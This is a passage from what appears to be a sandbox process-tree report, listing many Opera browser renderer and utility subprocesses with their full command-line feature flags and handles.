--field-trial-handle=3844,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=4332,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6832,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:12⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3692,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6560 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=4288,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3384,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6788 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6904,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=5748,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3280 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=7036,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=7032,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6944,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7156 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3268,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3896,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3344,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3864 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=7408,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7436 /prefetch:92⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=3104,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:92⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3556,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6376,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=7596,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=2360 /prefetch:142⤵
-
-
